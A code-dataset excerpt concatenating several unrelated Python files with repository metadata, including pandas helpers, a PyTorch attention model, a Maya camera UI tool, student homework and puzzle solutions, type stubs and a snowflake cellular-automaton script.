df.to_clipboard(sep="\t", **args)
def df_equal(df1, df2):
"""
compares two dataframe and tells if they are equal
@param df1 first dataframe
@param df2 second dataframe
@return boolean
The function compare column one by one.
It does not check the order of the columns is the same.
It reorders the columns before doing the comparison.
If you need more complex comparison,
you can look into function `assert_frame_equal <https://github.com/pydata/pandas/blob/master/pandas/util/testing.py>`_.
The function does not handle well NaN values because ``numpy.nan != numpy.nan`` is true.
It also compares types:
@FAQ(pandas___Comment comparer deux dataframe?)
Ecrire ``df1 == df2`` ne compare pas deux dataframes entre deux
car le sens n'est pas forcément le même pour tout le monde.
Même si les valeurs sont les mêmes, est-ce l'ordre des colonnes
est important ?
Il faut donc le faire soi-même. Le code ci-dessus
compare d'abord les dimensions, ensuite compare l'ordre
des colonnes puis enfin les valeurs ::
if df1.shape != df2.shape:
return False
l1 = list(df1.columns)
l2 = list(df2.columns)
l1.sort()
l2.sort()
if l1 != l2:
return False
df1 = df1[l1]
df2 = df2[l2]
t = (df1 == df2).all()
s = set(t)
return False not in s
@endFAQ
"""
if df1.shape != df2.shape:
return False
l1 = list(df1.columns)
l2 = list(df2.columns)
l1.sort()
l2.sort()
if l1 != l2:
return False
df1 = df1[l1]
df2 = df2[l2]
s = set((df1.dtypes == df2.dtypes))
if False in s:
return False
s = set((df1 == df2).all())
return False not in s
def groupby_topn(df, by_keys, sort_keys, ascending=True, n=1, as_index=True):
"""
takes the top n rows per group
@param df dataframe
@param by_keys rows will be grouped by these columns
@param sort_keys rows will be sorted by these columns
@param ascending parameter associated to sord function
@param n n in top *n*
@param as_index if False, remove the index after the group by
@return result
@FAQ(pandas___top n lignes avec pandas)
Grouper puis garder les premières observations de ce groupe est un problème
classique. Il n'existe pas de meilleure façon de le faire,
cela dépend du nombre d'obervations par groupe. Le moyen le plus simple
de le faire avec pandas est :
* grouper les lignes
* trier les lignes dans chaque groupe
* garder les premières lignes dans chaque groupe
Ceci donne ::
df.groupby(by_keys)
.apply(lambda x: x.sort(sort_keys, ascending=ascending).head(head))
.reset_index(drop=True)
La dernière instruction supprimer l'index ce qui donne au dataframe final
la même structure que le dataframe initial.
.. runpython::
:showcode:
import pandas
l = [ dict(k1="a", k2="b", v=4, i=1),
dict(k1="a", k2="b", v=5, i=1),
dict(k1="a", k2="b", v=4, i=2),
dict(k1="b", k2="b", v=1, i=2),
dict(k1="b", k2="b", v=1, i=3)]
df = pandas.DataFrame(l)
df.groupby(["k1", "k2"]).apply(lambda x: x.sort(["v", "i"], ascending=True).head(1))
print(df)
@endFAQ
"""
res = df.groupby(by_keys).apply(lambda x: x.sort(
sort_keys, ascending=ascending).head(n))
if not as_index:
res = res.reset_index(drop=True)
return res
|
[
"xavier.dupre@ensae.fr"
] |
xavier.dupre@ensae.fr
|
1a7add79983d9aaaa4ac9d383db387f438a20b30
|
3abe14e934f775aca6dba588a9da5c908808daec
|
/setuptools/tests/test_depends.py
|
e0cfa88049d7ab7e93b8af06cdac45ee96c0714d
|
[
"MIT"
] |
permissive
|
IronLanguages/setuptools
|
e1d6d6aaf990a2691f79ce3a4ca21b87e2f10a1a
|
20aa9400b3d44df952c362217d3c5a1c3988467f
|
refs/heads/master
| 2020-03-19T04:21:15.955081
| 2018-06-02T13:26:55
| 2018-06-02T13:26:55
| 135,819,098
| 2
| 1
|
MIT
| 2018-06-02T13:17:01
| 2018-06-02T13:17:01
| null |
UTF-8
|
Python
| false
| false
| 374
|
py
|
import sys
from setuptools import depends
class TestGetModuleConstant:
def test_basic(self):
"""
Invoke get_module_constant on a module in
the test package.
"""
mod_name = 'setuptools.tests.mod_with_constant'
val = depends.get_module_constant(mod_name, 'value')
assert val == 'three, sir!'
assert 'setuptools.tests.mod_with_constant' not in sys.modules
|
[
"jaraco@jaraco.com"
] |
jaraco@jaraco.com
|
c03e87ec7816e07b685894a92fa3274d5414db6c
|
e80393d0e32358d68e60b5119406c654d2373e1f
|
/encoding/models/aca2.py
|
83cbbae9f07d7dbe332b8679537ef97e0f8d8c86
|
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
yougoforward/Fast_psaa
|
3e333fb31743bda7684cc0bdae378bf40d839f63
|
68e99cd5bcf3bf5ab45ea604c3898fabc458c020
|
refs/heads/master
| 2022-11-04T02:01:03.694010
| 2019-11-30T07:53:01
| 2019-11-30T07:53:01
| 224,800,023
| 1
| 1
|
NOASSERTION
| 2022-10-26T23:53:43
| 2019-11-29T07:27:43
|
Python
|
UTF-8
|
Python
| false
| false
| 7,162
|
py
|
from __future__ import division
import torch
import torch.nn as nn
import torch.nn.functional as F
from .mask_softmax import Mask_Softmax
from .fcn import FCNHead
from .base import BaseNet
__all__ = ['ACA2Net', 'get_aca2net']
class ACA2Net(BaseNet):
def __init__(self, nclass, backbone, aux=True, se_loss=False, norm_layer=nn.BatchNorm2d, **kwargs):
super(ACA2Net, self).__init__(nclass, backbone, aux, se_loss, norm_layer=norm_layer, **kwargs)
self.head = ACA2NetHead(2048, nclass, norm_layer, se_loss, jpu=kwargs['jpu'], up_kwargs=self._up_kwargs)
if aux:
self.auxlayer = FCNHead(1024, nclass, norm_layer)
def forward(self, x):
_, _, h, w = x.size()
_, _, c3, c4 = self.base_forward(x)
x = list(self.head(c4))
x[0] = F.interpolate(x[0], (h, w), **self._up_kwargs)
if self.aux:
auxout = self.auxlayer(c3)
auxout = F.interpolate(auxout, (h, w), **self._up_kwargs)
x.append(auxout)
return tuple(x)
class ACA2NetHead(nn.Module):
def __init__(self, in_channels, out_channels, norm_layer, se_loss, jpu=False, up_kwargs=None,
atrous_rates=(12, 24, 36)):
super(ACA2NetHead, self).__init__()
self.se_loss = se_loss
inter_channels = in_channels // 4
# self.conv5c = nn.Sequential(nn.Conv2d(in_channels, inter_channels, 3, padding=1, bias=False),
# norm_layer(inter_channels),
# nn.ReLU(inplace=True))
self.sec = guided_SE_CAM_Module(in_channels, inter_channels, norm_layer)
self.conv5e = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 1, padding=0, bias=False),
norm_layer(inter_channels), nn.ReLU(True))
# self.conv5c2 = nn.Sequential(nn.Conv2d(in_channels, inter_channels, 3, padding=1, bias=False),
# norm_layer(inter_channels),
# nn.ReLU(inplace=True))
self.sec2 = guided_SE_CAM_Module(in_channels, inter_channels, norm_layer)
self.conv5e2 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 1, padding=0, bias=False),
norm_layer(inter_channels), nn.ReLU(True))
self.conv8 = nn.Sequential(nn.Dropout2d(0.1), nn.Conv2d(512, out_channels, 1))
self.gap = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Sequential(
nn.Conv2d(inter_channels, inter_channels, 1),
nn.Sigmoid())
if self.se_loss:
self.selayer = nn.Linear(inter_channels, out_channels)
def forward(self, x):
# sec
# feat = self.conv5c(x)
sec_feat = self.sec(x)
sec_feat = self.conv5e(sec_feat)
# feat2 = self.conv5c2(x)
sec_feat2 = self.sec2(x)
sec_feat2 = self.conv5e2(sec_feat2)
feat_sum = sec_feat + sec_feat2
if self.se_loss:
gap_feat = self.gap(feat_sum)
gamma = self.fc(gap_feat)
outputs = [self.conv8(F.relu_(feat_sum + feat_sum * gamma))]
outputs.append(self.selayer(torch.squeeze(gap_feat)))
else:
outputs = [self.conv8(feat_sum)]
return tuple(outputs)
def get_aca2net(dataset='pascal_voc', backbone='resnet50', pretrained=False,
root='~/.encoding/models', **kwargs):
# infer number of classes
from ..datasets import datasets
model = ACA2Net(datasets[dataset.lower()].NUM_CLASS, backbone=backbone, root=root, **kwargs)
if pretrained:
raise NotImplementedError
return model
class guided_CAM_Module(nn.Module):
""" Position attention module"""
# Ref from SAGAN
def __init__(self, in_dim, out_dim):
super(guided_CAM_Module, self).__init__()
self.chanel_in = in_dim
self.chanel_out = out_dim
self.query_conv = nn.Sequential(
nn.Conv2d(in_channels=in_dim, out_channels=out_dim, kernel_size=1, bias=False), nn.BatchNorm2d(out_dim),
nn.ReLU())
self.key_conv = nn.Sequential(
nn.Conv2d(in_channels=in_dim, out_channels=out_dim, kernel_size=1, bias=False), nn.BatchNorm2d(out_dim),
nn.ReLU())
self.value_conv = nn.Sequential(
nn.Conv2d(in_channels=in_dim, out_channels=out_dim, kernel_size=1, bias=False), nn.BatchNorm2d(out_dim),
nn.ReLU())
self.gamma = nn.Parameter(torch.zeros(1))
self.softmax = nn.Softmax(dim=-1)
def forward(self,x):
"""
inputs :
x : input feature maps( B X C X H X W)
returns :
out : attention value + input feature
attention: B X C X C
"""
m_batchsize, C, height, width = x.size()
proj_query = self.query_conv(x).view(m_batchsize, self.chanel_out, -1)
proj_key = self.key_conv(x).view(m_batchsize, self.chanel_out, -1).permute(0, 2, 1)
energy = torch.bmm(proj_query, proj_key)
energy_new = torch.max(energy, -1, keepdim=True)[0].expand_as(energy)-energy
attention = self.softmax(energy_new)
proj_value = self.value_conv(x)
out = torch.bmm(attention, proj_value.view(m_batchsize, self.chanel_out, -1))
out = out.view(m_batchsize, self.chanel_out, height, width)
out = self.gamma*out + proj_value
return out
class SE_Module(nn.Module):
""" Channel attention module"""
def __init__(self, in_dim, out_dim):
super(SE_Module, self).__init__()
self.se = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)),
nn.Conv2d(in_dim, in_dim // 16, kernel_size=1, padding=0, dilation=1,
bias=True),
nn.ReLU(),
nn.Conv2d(in_dim // 16, out_dim, kernel_size=1, padding=0, dilation=1,
bias=True),
nn.Sigmoid()
)
def forward(self, x):
out = self.se(x)
return out
class guided_SE_CAM_Module(nn.Module):
""" Channel attention module"""
def __init__(self, in_dim, out_dim, norm_layer):
super(guided_SE_CAM_Module, self).__init__()
self.guided_cam = guided_CAM_Module(in_dim, out_dim)
self.project = nn.Sequential(
nn.Conv2d(in_dim, out_dim, kernel_size=1, padding=0, dilation=1, bias=False),
norm_layer(out_dim), nn.ReLU(True),
)
self.se = SE_Module(in_dim, out_dim)
self.relu = nn.ReLU()
def forward(self, x):
"""
inputs :
x : input feature maps( B X C X H X W)
returns :
out : attention value + input feature
attention: B X C X C
"""
gcam = self.guided_cam(x)
bottle = self.project(x)
se_x = self.se(x)
se_bottle = se_x * bottle + bottle
# out = torch.cat([gcam, se_bottle], dim=1)
out = self.relu(se_bottle+gcam)
return out
|
[
"908865817@qq.com"
] |
908865817@qq.com
|
3c145b8ef4e538afdc8b05b7dc35000c6cd14bde
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/429/usersdata/321/107581/submittedfiles/jogoDaVelha.py
|
b5f5699b08831f08b81685112bfe8cf9f27f5873
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 962
|
py
|
# -*- coding: utf-8 -*-
from jogoDaVelha_BIB import *
# COLOQUE SEU PROGRAMA A PARTIR DAQUI
print('Bem vindo ao JogoDaVelha do grupo 8 [Iara, Ingrid, Luiz Otávio, Tatiane]\n')
a=nome()
b=solicitaSimboloDoHumano()
sort=sorteioPrimeiraJogada(a)
if sort==0:
if b == 'X':
c = ' O '
else:
c = ' X '
JogadaComputador(c)
mostrarTabuleiro()
p=JogadaHumana(a,b)
else:
if b == 'X':
c = ' O '
else:
c = ' X '
p=JogadaHumana(a,b)
JogadaComputador(c)
mostrarTabuleiro()
while not verificaVencedor(b,tabuleiro,a):
if sort==0:
if JogadaComputador(c):
mostrarTabuleiro()
JogadaHumana(a,b)
mostrarTabuleiro()
else:
if JogadaHumana(a,b):
if JogadaComputador(c):
mostrarTabuleiro()
#if not jogueNovamente():
#break
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
af8822c01c2eae258d213fcd4fb4dabd0f0f483b
|
9a9e0398f26cee9864d48c4618c0a482e5475e83
|
/Python/code/design_browser_history.py
|
21040767673ace8a3036f93a95df6462006bd225
|
[] |
no_license
|
CNife/leetcode
|
92693c653bb41780ee431293286c3e909009e9b0
|
7cdd61692ecb52dd1613169e80b924dd39d35996
|
refs/heads/main
| 2021-06-22T21:22:12.997253
| 2021-03-18T07:07:15
| 2021-03-18T07:07:15
| 206,955,329
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,124
|
py
|
from typing import List
class BrowserHistory:
def __init__(self, homepage: str):
self.stack: List[str] = [homepage]
self.pointer: int = 0
def visit(self, url: str) -> None:
if self.pointer < len(self.stack) - 1:
self.stack[self.pointer + 1] = url
del self.stack[self.pointer + 2 :]
else:
self.stack.append(url)
self.pointer += 1
def back(self, steps: int) -> str:
back_pointer = max(self.pointer - steps, 0)
self.pointer = back_pointer
return self.stack[back_pointer]
def forward(self, steps: int) -> str:
forward_pointer = min(self.pointer + steps, len(self.stack) - 1)
self.pointer = forward_pointer
return self.stack[forward_pointer]
b = BrowserHistory("leetcode.com")
b.visit("google.com")
b.visit("facebook.com")
b.visit("youtube.com")
assert b.back(1) == "facebook.com"
assert b.back(1) == "google.com"
assert b.forward(1) == "facebook.com"
b.visit("linkedin.com")
assert b.forward(2) == "linkedin.com"
assert b.back(2) == "google.com"
assert b.back(7) == "leetcode.com"
|
[
"CNife@vip.qq.com"
] |
CNife@vip.qq.com
|
8f531582e923fb0fb0831e88beb903ecdecbc8a3
|
b521802cca8e4ee4ff5a5ffe59175a34f2f6d763
|
/maya/maya-utils/Scripts/Animation/2019-2-15 Tim Cam_Route_Manager/.history/Cam_Main/Cam_Main/Cam_Item_Layout_20190119190257.py
|
89fe9b62ef2019192a357e1a4849c612a4a637d1
|
[] |
no_license
|
all-in-one-of/I-Do-library
|
2edf68b29558728ce53fe17168694ad0353a076e
|
8972ebdcf1430ccc207028d8482210092acf02ce
|
refs/heads/master
| 2021-01-04T06:58:57.871216
| 2019-12-16T04:52:20
| 2019-12-16T04:52:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,985
|
py
|
# -*- coding:utf-8 -*-
# Require Header
import os
import json
from functools import partial
# Sys Header
import sys
import traceback
import subprocess
import plugin.Qt as Qt
from Qt.QtCore import *
from Qt.QtGui import *
from Qt.QtWidgets import *
def loadUiType(uiFile):
import plugin.Qt as Qt
if Qt.__binding__.startswith('PyQt'):
from Qt import _uic as uic
return uic.loadUiType(uiFile)
elif Qt.__binding__ == 'PySide':
import pysideuic as uic
else:
import pyside2uic as uic
import xml.etree.ElementTree as xml
from cStringIO import StringIO
parsed = xml.parse(uiFile)
widget_class = parsed.find('widget').get('class')
form_class = parsed.find('class').text
with open(uiFile, 'r') as f:
o = StringIO()
frame = {}
uic.compileUi(f, o, indent=0)
pyc = compile(o.getvalue(), '<string>', 'exec')
exec pyc in frame
# Fetch the base_class and form class based on their type
# in the xml from designer
form_class = frame['Ui_%s'%form_class]
base_class = eval('%s'%widget_class)
return form_class, base_class
from Qt.QtCompat import wrapInstance
DIR = os.path.dirname(__file__)
UI_PATH = os.path.join(DIR,"ui","Cam_Item_Layout.ui")
GUI_STATE_PATH = os.path.join(DIR, "json" ,'GUI_STATE.json')
form_class , base_class = loadUiType(UI_PATH)
from maya import cmds
class Cam_Item_Layout(form_class,base_class):
def __init__(self,MainWindow):
super(Cam_Item_Layout,self).__init__()
self.setupUi(self)
self.MainWindow = MainWindow
self.Item_Add_BTN.clicked.connect(self.Item_Add_Fn)
self.Item_Clear_BTN.clicked.connect(self.Item_Clear_Fn)
self.Cam_Item_Num = 0
self.Cam_Item_Scroll.verticalScrollBar().valueChanged.connect(self.Scroll_Fn)
self.Scroll_Offset = 0
self.Attr = {}
self.Attr["Add_Crv_LE"] = ""
self.Attr["Add_Motion_Path_LE"] = ""
self.Attr["Add_CamGrp_LE"] = ""
self.Attr["Add_Loc_LE"] = ""
self.Attr["Name"] = ""
# Note 功能按键
self.Batch_Keyframe_BTN.clicked.connect(self.Batch_Keyframe_Fn)
self.Select_Path_BTN.clicked.connect(self.Select_Path_Fn)
def Batch_Keyframe_Fn(self):
ChildrenList = self.Item_Layout.children()
for i,child in enumerate(ChildrenList):
if i != 0:
Path = child.Attr["Add_Motion_Path_LE"]
if cmds.objExists(Path):
offset = cmds.keyframe(Path,q=1)[0]
cmds.keyframe("%s.uValue"% Path,e=1,iub=1,r=1,o="over",tc=-offset)
def Select_Path_Fn(self):
cmds.select(cl=1)
ChildrenList = self.Item_Layout.children()
for i,child in enumerate(ChildrenList):
if i != 0:
if cmds.objExists(child.Attr["Add_Motion_Path_LE"]):
cmds.select(child.Attr["Add_Motion_Path_LE"],add=1)
def Item_Add_Fn(self):
self.Cam_Item_Num += 1
return Cam_Item(self,self.MainWindow)
def Item_Clear_Fn(self):
self.Attr["Add_Crv_LE"] = ""
self.Attr["Add_Motion_Path_LE"] = ""
self.Attr["Name"] = ""
for i,child in enumerate(self.Item_Layout.children()):
if i != 0:
child.deleteLater()
def Scroll_Fn(self):
self.Scroll_Offset = self.Cam_Item_Scroll.verticalScrollBar().value()
UI_PATH = os.path.join(DIR,"ui","Cam_Item.ui")
form_class , base_class = loadUiType(UI_PATH)
class Cam_Item(form_class,base_class):
def __init__(self,parent,MainWindow):
super(Cam_Item,self).__init__()
self.setupUi(self)
self.MainWindow = MainWindow
self.Cam_Del_BTN.clicked.connect(self.Cam_Del_BTN_Fn)
self.Cam_Con_CB.stateChanged.connect(self.Cam_Con_CB_Fn)
# Note 初始化创建参数
TotalCount = len(parent.Item_Layout.children())
parent.Item_Layout.layout().insertWidget(TotalCount-1,self)
self.Cam_LE.setText("Cam_Item_%s" % parent.Cam_Item_Num)
self.Cam_Num_Label.setText(u"镜头%s" % TotalCount)
self.setObjectName("Cam_Item_%s" % TotalCount)
self.Num = TotalCount
self.Attr = {}
self.Attr["Add_CamGrp_LE"] = ""
self.Attr["Add_Loc_LE"] = ""
self.Attr["Add_Crv_LE"] = ""
self.Attr["Add_Motion_Path_LE"] = ""
self.Attr["Strat_Time_SB"] = 0
self.Attr["End_Time_SB"] = 0
self.MainWindow.Save_Json_Fun()
def Cam_Del_BTN_Fn(self):
self.deleteLater()
ChildrenList = self.parent().children()
for i,child in enumerate(ChildrenList):
if i != 0:
if i > self.Num:
# Note 修正 child 的序号
child.Num -= 1
child.Cam_Num_Label.setText(u"镜头%s" % (i-1))
child.setObjectName("Cam_Item_%s" % (i-1))
else:
child.Cam_Num_Label.setText(u"镜头%s" % i)
child.setObjectName("Cam_Item_%s" % i)
self.Attr["Add_CamGrp_LE"] = ""
self.Attr["Add_Loc_LE"] = ""
self.Attr["Add_Crv_LE"] = ""
self.Attr["Add_Motion_Path_LE"] = ""
self.Attr["Strat_Time_SB"] = ""
self.Attr["End_Time_SB"] = ""
self.MainWindow.Save_Json_Fun()
def Cam_Con_CB_Fn(self,state):
ChildrenList = self.parent().children()
for i,child in enumerate(ChildrenList):
if i != 0:
if child != self:
child.Cam_Con_CB.blockSignals(True)
child.Cam_Con_CB.setChecked(False)
if state == 0:
self.Cam_Con_CB.setChecked(True)
else
for i,child in enumerate(ChildrenList):
if i != 0:
if child != self:
child.Cam_Con_CB.blockSignals(False)
|
[
"2595715768@qq.com"
] |
2595715768@qq.com
|
ab8798f43f4e62010d729812993d84aa181dc52b
|
14373275670c1f3065ce9ae195df142146e2c1a4
|
/stubs/python-jose/jose/jws.pyi
|
777770ae62ba7928c9ecd32abfe7fdcce15fb17d
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
sobolevn/typeshed
|
eb7af17c06a9722f23c337e6b9a4726223155d58
|
d63a82640390a9c130e0fe7d409e8b0b836b7c31
|
refs/heads/master
| 2023-08-04T05:59:29.447015
| 2023-06-14T21:27:53
| 2023-06-14T21:27:53
| 216,265,622
| 2
| 0
|
Apache-2.0
| 2022-02-08T10:40:53
| 2019-10-19T20:21:25
|
Python
|
UTF-8
|
Python
| false
| false
| 939
|
pyi
|
from collections.abc import Container, Mapping
from typing import Any
from .backends.base import Key
def sign(
payload: bytes | Mapping[str, Any],
# Internally it's passed down to jwk.construct(), which explicitly checks for
# key as dict instance, instead of a Mapping
key: str | bytes | dict[str, Any] | Key,
headers: Mapping[str, Any] | None = None,
algorithm: str = "HS256",
) -> str: ...
def verify(
token: str | bytes,
key: str | bytes | Mapping[str, Any] | Key,
# Callers of this function, like jwt.decode(), and functions called internally,
# like jws._verify_signature(), use and accept algorithms=None
algorithms: str | Container[str] | None,
verify: bool = True,
) -> bytes: ...
def get_unverified_header(token: str | bytes) -> dict[str, Any]: ...
def get_unverified_headers(token: str | bytes) -> dict[str, Any]: ...
def get_unverified_claims(token: str | bytes) -> bytes: ...
|
[
"noreply@github.com"
] |
sobolevn.noreply@github.com
|
83dee180bba344ba4431b5eddabacca981be46a9
|
ea378480ba678eb123ef826e3ca0c3eb8f4e538f
|
/py ref/agg:PIL/05-snowflake.py
|
685698ad5cd2aee1ad26a0569fba738e94d596b8
|
[] |
no_license
|
msarch/py
|
67235643666b1ed762d418263f7eed3966d3f522
|
dcd25e633a87cdb3710e90224e5387d3516c1cd3
|
refs/heads/master
| 2021-01-01T05:21:58.175043
| 2017-05-25T08:15:26
| 2017-05-25T08:15:26
| 87,453,820
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,443
|
py
|
# Snowflake Simulation Using Reiter Cellular Automata
# Source: "A Local Cellular Model for Snow Crystal Growth" by Cliff Reiter
# FB36 - 20130107
import math
import random
from PIL import Image, ImageDraw
imgx = 500; imgy = 500 # image size
imgx1 = imgx - 1; imgy1 = imgy - 1
image = Image.new("RGB", (imgx, imgy))
draw = ImageDraw.Draw(image)
pixels = image.load()
maxIt = 10 # of growth steps
# snowflake will differ depending on values of these parameters:
alpha = random.random() * 1.5 + 0.5
beta = random.random() * 0.3 + 0.3
gamma = random.random() * 0.01
mx = 250; my = 250 # width and height of 2DCA
ca = [[beta for x in range(mx)] for y in range(my)]
caRep = [[beta for x in range(mx)] for y in range(my)] # receptive cells
caNRep = [[beta for x in range(mx)] for y in range(my)] # non-receptive cells
dx = [-1, 0, -1, 1, 0, 1]; dy = [-1, -1, 0, 0, 1, 1] # 6 directions to grow
# these are for coloring the image
while True:
mr0 = 2 ** random.randint(3, 6); mr1 = 256 / mr0
mg0 = 2 ** random.randint(3, 6); mg1 = 256 / mg0
mb0 = 2 ** random.randint(3, 6); mb1 = 256 / mb0
if mr0 != mg0 and mr0 != mb0 and mg0 != mb0: break
ca[(my - 1) / 2][(mx - 1) / 2] = 1.0 # ice seed
for i in range(maxIt): # growth steps
print "Growth Step: " + str(i + 1) + " of " + str(maxIt)
# separate the array into receptive and non-receptive arrays
for iy in range(my):
for ix in range(mx):
receptive = False
if ca[iy][ix] >= 1.0: # ice
receptive = True
else: # check neighbors
for j in range(6):
jx = ix + dx[j]; jy = iy + dy[j]
if jx >= 0 and jx < mx and jy >= 0 and jy < my:
if ca[jy][jx] >= 1.0: # ice
receptive = True
break
if receptive:
caRep[iy][ix] = ca[iy][ix] + gamma
caNRep[iy][ix] = 0.0
else:
caRep[iy][ix] = 0.0
caNRep[iy][ix] = ca[iy][ix]
# new array: weighed averages of the non-receptive array + receptive array
for iy in range(my):
for ix in range(mx):
wsum = caNRep[iy][ix] * (1.0 - alpha * 6.0 / 12.0)
for j in range(6): # neighbors
jx = ix + dx[j]; jy = iy + dy[j]
if jx >= 0 and jx < mx and jy >= 0 and jy < my:
wsum += caNRep[jy][jx] * alpha / 12.0
ca[iy][ix] = caRep[iy][ix] + wsum
# paint final state of the snowflake
an45 = - math.pi / 4.0
sn45 = math.sin(an45); cs45 = math.cos(an45)
scale = math.sqrt(3.0); ox = imgx1 / 2.0; oy = imgy1 / 2.0
for ky in range(imgy):
for kx in range(imgx):
# apply geometric transformation (scaling and rotation)
print ky,kx
tx = kx - ox; ty = (ky - oy) * scale
tx0 = tx * cs45 - ty * sn45 + ox
ty = tx * sn45 + ty * cs45 + oy; tx = tx0
if tx >= 0 and tx <= imgx1 and ty >= 0 and ty <= imgy1:
c = ca[int((my - 1) * ty / imgy1)][int((mx - 1) * tx / imgx1)]
if c >= 1.0: # ice
c = int((c - 1.0) * 255)
pixels[kx, ky] = (c % mr0 * mr1, c % mg0 * mg1, c % mb0 * mb1)
label = "alpha = " + str(alpha) + " beta = " + str(beta) + " gamma = " + str(gamma)
draw.text((0, 0), label, (0, 255, 0)) # write to top-left using green color
image.save("Snowflake.png", "PNG")
print "done"
|
[
"msarch@free.fr"
] |
msarch@free.fr
|
c26ce4af3e3326663a505c3563633472e49af3ec
|
f87f51ec4d9353bc3836e22ac4a944951f9c45c0
|
/.history/HW06_20210715232125.py
|
82e83460b2b3572ef7ede77011ce58249bbfcda0
|
[] |
no_license
|
sanjayMamidipaka/cs1301
|
deaffee3847519eb85030d1bd82ae11e734bc1b7
|
9ddb66596497382d807673eba96853a17884d67b
|
refs/heads/main
| 2023-06-25T04:52:28.153535
| 2021-07-26T16:42:44
| 2021-07-26T16:42:44
| 389,703,530
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,842
|
py
|
"""
Georgia Institute of Technology - CS1301
HW06 - Text Files & CSV
Collaboration Statement:
"""
#########################################
"""
Function Name: findCuisine()
Parameters: filename (str), cuisine (str)
Returns: list of restaurants (list)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def findCuisine(filename, cuisine):
file = open(filename,'r')
content = file.readlines()
listOfRestaurants = []
for i in range(len(content)):
if content[i].strip() == cuisine:
listOfRestaurants.append(content[i-1].strip()) #add the name of the restaurant, which is the previous line
file.close()
return listOfRestaurants
"""
Function Name: restaurantFilter()
Parameters: filename (str)
Returns: dictionary that maps cuisine type (str)
to a list of restaurants of the same cuisine type (list)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def restaurantFilter(filename):
dict = {}
file = open(filename,'r')
content = file.readlines()
cuisines = []
for i in range(1,len(content),4):
line = content[i].strip()
if line not in cuisines:
cuisines.append(line)
for i in range(len(cuisines)):
dict[cuisines[i]] = []
for i in range(0,len(content),4):
line = content[i].strip()
lineBelow = content[i+1].strip()
dict[lineBelow].append(line)
return dict
"""
Function Name: createDirectory()
Parameters: filename (str), output filename (str)
Returns: None (NoneType)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def createDirectory(filename, outputFilename):
readFile = open(filename, 'r')
writeFile = open(outputFilename, 'w')
content = readFile.readlines()
fastfood = []
sitdown = []
fastfoodcounter = 1
sitdowncouter = 1
for i in range(2,len(content), 4):
restaurant = content[i-2].strip()
cuisine = content[i-1].strip()
group = content[i].strip()
if group == 'Fast Food':
fastfood.append(str(fastfoodcounter) + '. ' + restaurant + ' - ' + cuisine + '\n')
fastfoodcounter += 1
else:
sitdown.append(str(sitdowncouter) + '. ' + restaurant + ' - ' + cuisine)
sitdowncouter += 1
writeFile.write('Restaurant Directory' + '\n')
writeFile.write('Fast Food' + '\n')
writeFile.writelines(fastfood)
writeFile.write('Sit-down' + '\n')
for i in range(len(sitdown)):
if i != len(sitdown)-1:
writeFile.write(sitdown[i] + '\n')
else:
writeFile.write(sitdown[i])
"""
Function Name: extraHours()
Parameters: filename (str), hour (int)
Returns: list of (person, extra money) tuples (tuple)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def extraHours(filename, hour):
overtime = []
file = open(filename, 'r')
header = file.readline()
content = file.readlines()
for i in content:
line = i.strip().split(',')
name = line[0]
wage = int(line[2])
hoursWorked = int(line[4])
if hoursWorked > hour:
compensation = (hoursWorked - hour) * wage
overtime.append((name, compensation))
return overtime
"""
Function Name: seniorStaffAverage()
Parameters: filename (str), year (int)
Returns: average age of senior staff members (float)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def seniorStaffAverage(filename, year):
averageAge = 0.0
employeeCount = 0
file = open(filename, 'r')
header = file.readline()
content = file.readlines()
for i in content:
line = i.strip().split(',')
age = int(line[1])
yearHired = int(line[3])
if yearHired < year:
averageAge += age
employeeCount += 1
averageAge /= employeeCount
return round(averageAge,2)
"""
Function Name: ageDict()
Parameters: filename (str), list of age ranges represented by strings (list)
Returns: dictionary (dict) that maps each age range (str) to a list of employees (list)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def ageDict(filename, ageRangeList):
employeeAgeDictionary = {}
newDict = {}
ageRangesFormatted = []
for i in ageRangeList:
employeeAgeDictionary[i] = []
# print(employeeAgeDictionary)
for i in ageRangeList:
ageRangesFormatted.append(i.split('-'))
# print(ageRangesFormatted)
file = open(filename, 'r')
header = file.readline()
content = file.readlines()
for i in content:
line = i.strip().split(',')
age = int(line[1])
name = line[0]
for j in ageRangesFormatted:
if age >= int(j[0]) and age <= int(j[1]):
employeeAgeDictionary[j[0] + '-' + j[1]].append(name)
for i in employeeAgeDictionary:
if employeeAgeDictionary[i] != []:
newDict[i] = employeeAgeDictionary[i]
return newDict
# print(findCuisine('restaurants.txt', 'Mexican'))
# print(restaurantFilter('restaurants.txt'))
# print(createDirectory('restaurants.txt','output.txt'))
# print(extraHours('employees.csv', 40))
# print(seniorStaffAverage('employees.csv', 2019))
# rangeList = ["20-29", "30-39"]
# print(ageDict('employees.csv', rangeList))
# print(ageDict('employees.csv', ['0-18', '18-19']))
|
[
"sanjay.mamidipaka@gmail.com"
] |
sanjay.mamidipaka@gmail.com
|
8498795049bcc029a2c71a310a2525dd63063293
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_commoners.py
|
ba7756247f776e21069b78a695be616e5b343ce5
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
